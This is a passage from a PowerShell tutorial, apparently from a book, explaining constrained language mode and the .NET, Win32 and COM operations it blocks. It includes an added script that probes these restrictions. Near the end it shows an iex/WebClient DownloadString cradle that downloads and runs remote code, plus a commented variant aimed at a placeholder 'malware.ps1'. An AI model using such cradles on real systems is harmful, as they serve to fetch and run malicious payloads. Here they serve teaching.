Constrained language mode
PowerShell offers several language modes, one of which is constrained language mode. In this mode, only core PowerShell functionality works, and the following are prevented:
- Using .NET methods directly
- Using Win32 APIs
- Using COM objects
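The restrictions listed above can be observed side by side without changing the current session. The following is an added example, not code from the original text: it runs the same probes in two separate in-process runspaces, one in FullLanguage and one in ConstrainedLanguage mode. The function name Test-InLanguageMode, the probe names and the Probe.K32 type are assumptions of this example, and it assumes it is started from a Windows session that is itself in full language mode.

```powershell
# Added example: Test-InLanguageMode and the probe names are assumptions.
function Test-InLanguageMode {
    param(
        [Parameter(Mandatory)] [System.Management.Automation.PSLanguageMode] $Mode,
        [Parameter(Mandatory)] [System.Collections.IDictionary] $Probes
    )
    # Build a separate runspace so the calling session's mode is never changed.
    $iss = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()
    $iss.LanguageMode = $Mode
    $runspace = [runspacefactory]::CreateRunspace($iss)
    $runspace.Open()
    try {
        foreach ($name in $Probes.Keys) {
            # The try/catch executes inside the target runspace, so a blocked
            # operation comes back as text instead of aborting the run.
            $template = '$ErrorActionPreference = "Stop"; ' +
                        'try { $null = __PROBE__; "allowed" } catch { "blocked: $_" }'
            $ps = [powershell]::Create()
            $ps.Runspace = $runspace
            try {
                $out = $ps.AddScript($template.Replace('__PROBE__', $Probes[$name])).Invoke()
                $result = "$out"
            } catch {
                # Errors that escape the inner try/catch (for example parse errors).
                $result = "error: $($_.Exception.Message)"
            } finally {
                $ps.Dispose()
            }
            [pscustomobject]@{ Mode = $Mode; Probe = $name; Result = $result }
        }
    } finally {
        $runspace.Dispose()
    }
}

# One probe per restriction from the list; nothing is downloaded or executed.
$probes = [ordered]@{
    '.NET method call'       = '[System.IO.Path]::GetTempPath()'
    '.NET type (WebClient)'  = 'New-Object Net.WebClient'
    'Win32 API via Add-Type' = 'Add-Type -Namespace Probe -Name K32 -MemberDefinition ''[DllImport("kernel32.dll")] public static extern uint GetCurrentProcessId();'''
    'COM object'             = 'New-Object -ComObject Scripting.Dictionary'
}

'FullLanguage', 'ConstrainedLanguage' |
    ForEach-Object { Test-InLanguageMode -Mode $_ -Probes $probes } |
    Format-Table -AutoSize -Wrap
```

The Result column carries PowerShell's own error text for each blocked operation, which is also the text to look for when a script fails unexpectedly on a locked-down host.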
This example script shows the currently used language mode, which is FullLanguageMode:
#current language mode
$ExecutionContext.SessionState.LanguageMode
In this language mode, it is possible to use the web client from the .NET Framework to download and execute code dynamically:
#Using TLS 1.2
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
#(New-Object Net.WebClient).DownloadString('https://[website]/malware.ps1')
#example with $PSVersionTable
iex ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ddneves/Book_Learn_PowerShell/master/Ch1/RetrieveVersion.ps1'))
The retrieved code will display the $PSVersionTable variable. Now, we...